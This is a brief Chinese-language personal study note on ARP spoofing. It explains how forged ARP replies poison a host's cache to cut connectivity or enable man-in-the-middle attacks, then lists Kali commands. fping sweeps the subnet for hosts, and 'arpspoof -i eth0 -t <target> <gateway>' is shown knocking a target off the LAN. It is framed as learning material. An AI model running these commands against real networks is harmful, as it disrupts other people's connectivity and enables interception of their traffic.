攻击原理:ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。
获取局域网中的IP地址(以本机地址为实验):命令行执行ipconfig
获取的IP为192.168.1.xxx
网关为:192.168.1.1
打开kali linux终端,执行;ifconfig
得到本机网卡为:eth0
在终端中执行:arpspoof -i eth0 -t 192.168.1.xxx 192.168.1.1
执行成功;目标局域网失去连接。
Ctrl + C 终止命令。
如何获取局域网IP:
kali linux 终端执行:fping -asg 192.168.1.0/24(IP搜索根据本地IP进行)
其中第一个是网关,剩下的为IP。
局限性:只能攻击主机局域网中的目标机
本文仅充当本人学习笔记。